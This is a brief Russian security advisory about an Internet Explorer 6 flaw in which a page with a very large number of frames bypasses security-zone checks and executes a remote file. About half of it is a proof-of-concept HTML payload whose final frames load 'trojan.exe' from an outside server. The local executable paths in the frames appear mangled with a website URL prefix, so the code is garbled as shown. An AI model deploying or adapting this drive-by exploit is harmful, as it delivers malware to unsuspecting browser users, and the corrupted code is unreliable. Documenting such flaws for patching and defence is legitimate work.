Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный пользователь может сконструировать HTML, который заставит браузер выполнить произвольный код.
Сообщается, что удаленный пользователь может сконструировать HTML, который, когда будет загружен в браузере, заставит IE открыть большое количество фреймов. Если последние несколько фреймов ссылаются на злонамеренный файл, расположенный на удаленном сервере, IE не в состоянии проверить ограничения зоны безопасности для этих фреймов и выполнит произвольный код.
Уязвимость затрагивает не все версии IE. На уязвимых версиях существует некоторая вероятность несрабатывания уязвимости. Например, в IE 6.0.2800.1106 на Windows 2000 успешная работа эксплоита будет наблюдаться в 95% случаях. Пример:
<FRAME src="https://xakep.ru/wp-content/uploads/post/18527/C:\winnt\welcome.exe"></FRAME>
<FRAME src="https://xakep.ru/wp-content/uploads/post/18527/C:\winnt\notepad.exe"></FRAME>
<FRAME src="https://xakep.ru/wp-content/uploads/post/18527/C:\winnt\regedit.exe"></FRAME>
... together around 191 ... and after comes our trojan ...
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
<FRAME SRC="http://www.systemintegra.com/trojan.exe"></FRAME>
Уязвимость обнаружена в Microsoft Internet Explorer 6,
протестирована в 6.0.2800.1106 на Windows 2000.